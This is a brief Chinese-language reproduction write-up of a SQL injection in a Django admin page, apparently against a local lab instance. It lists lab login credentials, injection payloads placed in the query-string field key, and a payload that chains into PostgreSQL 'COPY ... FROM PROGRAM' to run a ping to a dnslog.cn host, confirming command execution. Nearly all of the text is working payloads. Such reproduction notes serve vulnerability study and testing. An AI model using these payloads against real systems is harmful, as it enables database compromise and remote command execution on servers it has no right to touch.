
复现
访问http://192.168.49.2:8000/admin
输入用户名admin ,密码a123123123
然后构造URL进行查询,payload:
http://192.168.49.2:8000/admin/vuln/collection/?detail__a'b=123
http://192.168.49.2:8000/admin/vuln/collection/?detail__title')='1' or 1=1--

发现存在sql注入
使用dnslog检测是否可以执行命令
http://192.168.49.2:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcopy cmd_exec FROM PROGRAM 'ping q60qaa.dnslog.cn'--%20